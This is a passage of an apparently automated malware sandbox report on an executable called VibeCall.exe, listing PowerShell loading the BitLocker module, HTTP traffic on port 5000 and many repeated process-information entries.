                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49751
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
